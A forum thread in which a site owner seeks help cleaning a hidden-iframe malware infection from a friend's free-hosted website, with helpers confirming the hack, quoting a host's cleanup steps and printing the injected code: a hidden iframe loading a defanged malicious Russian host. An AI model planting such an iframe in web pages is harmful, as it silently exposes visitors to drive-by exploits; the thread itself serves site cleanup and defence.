Hello All…
I created a small web site for a friend of mine who is an escort and put it up for her on a couple of the free hosting servers (Atspace.com and Izfree.com).
Recently, one of the hosted site links I created htXp://maygirl.atspace.com has been disabled by Google saying “This web site at maygirl.atspace.com has been reported as an attack site and has been blocked based on your security preferences” and the site no longer opens in Firefox browsers using the default security settings."
Then just the other day my friend started having people write to her reporting that her site on htXp://maygirl.izfree.com is now infected with the HTML:Iframe-inf virus/worm. It seems that Avast is the only virus software which can detect it, so I assume all the people who discovered the virus and wrote to her are running Avast.
I have done a lot of reading on this forum trying to figure out how to remove the virus from her site, and there are half a dozen posts on the subject, but to no avail. Most of what I have read on here seems to be geared towards advising people to avoid certain sites which contain the HTML:Iframe-inf virus/worm, but no advice on how to remove it from a site if your site is infected and you are the site administrator.
I have done a search within the code on all the HTML pages of the site for any scripts containing the words iframe, but I was not able to find anything locally on my computer within the site’s HTML files.
Any ideas on how to remove the script from the site would be much appreciated. I am wondering if it may have gotten in there in the first place from one of the banner ads she has on the site?
Cheers…
Hi colbybkk,
First a request to please break the links to the sites in question so they become unclickable by changing htp in htXp and www into wXw…so the ignorant cannot get infected by clicking it here.
Definitely a hacked site: References to 1 suspicious domain found.
1 hidden external link found.
Google currently lists this page as suspicious*
Redirecting to: 3a.ru suspicious - displaying 1 of 1
Malicious software includes 3 scripting exploit(s) via
Thank you polonus. I have fixed the links in my first post above as you requested.
Thank you also for looking into the infection and verifying that one exists.
So what can I do to fix the site and remove the infection please?
Many thanks…
- This is commonly down to old content management software being vulnerable, see this example of a HOSTs response to a hacked site.
We have patched up the server and we found a weakness in PHP which was helping aid the compromise of some domains. We updated it, and changed some default settings to help prevent these coding compromises. The weaknesses were not server wide but rather just made it easier on a hacker to compromise individual end user accounts.
I suggest the following clean up procedure for both your accounts:
-
check all index pages for any signs of java script injected into their coding. On windows servers check any “default.aspx” or
“default.cfm” pages as those are popular targets too.
-
Remove any “rouge” files or php scripts uploaded by the hackers into your account. Such scripts allowed them to make account wide
changes, spam through your account, or spread their own .htaccess files through all of your domains in that end user.
-
Check all .htaccess files, as hackers like to load re-directs into them.
-
Change all passwords for that end user account. The cp password, the ftp password, and any ftp sub accounts. Make sure to use a
“strong” password which includes upper case, lower case, numbers and NO COMPLETE WORDS OR NAMES!
This coupled with our server side changes should prevent any resurfacing of the hackers efforts. In some cases you may still have coding which allows for injection. All user input fields hidden or not should be hard coded, filtered, and sanitized before being handed off to php or a database which will prevent coding characters from being submitted and run through your software.
Also see, Tips for Cleaning & Securing Your Website, http://www.stopbadware.org/home/security.
Thank you. Can you please tell me how to identify any java script injected into the index page coding?
As for any of the other rouge files or anything else, I don’t think I have anything like that in there.
Thee was one .htaccess file in the cgi-bin directory which I just simply deleted and the site still runs fine.
Attached is a screen shot of what it now on the web hosting server.
Can someone please test to see if the worm has now been removed since I deleted the .htaccess file?
Any other ideas on how to clean the site would be much appreciated.
Many thanks…
Hi colbybkk
This was the code in question of the hidden iframe that we cannot connect to any longer:
^body><iframe src="htxp://b3a.ru:8080/index.php" width=171 height=186 style="visibility: hidden"></iframe^
polonus
Cheers polonus.
Does that mean I have managed to get rid of the malicious/infected code already and the site is clean now?
Also, I assume you are referring to htXp://maygirl.izfree.com as the site in your last message? If so, that is great news.
I was wondering if you also might be able to tell me why htXp://maygirl.atspace.com is being reported to Google as an attack site and is actually being blocked at the moment?
htXp://maygirl.izfree.com is the infected site, but htXp://maygirl.atspace.com is being reported as an attack site. Seems the problems I am having with the two of them may be different even though the 2 are the same site simply running on different host servers.
Thanks again…
Getting rid of the offending iframe tags is a short term measure as if you don’t resolve the underlying reason your sites were hacked then it will happen again.
You need to speak to your host about how they/you can secure your site, as I would guess that there are probably other sites hosted by izfree.com and atspace.com with the same problem.
It doesn’t take long for google to get to know about sites that have been hacked and are redirecting to malicious sites, they then add that site to its blacklist. How to get off it you would have to contact google. But before doing that you would have to have got to the underlying vulnerability that was the cause of the site getting hacked.
Usually websites for services like those and other adult intrests are targets for hackers. This is why I don’t suggest such buisness. The manager is going to have at least check for updates daily in the software.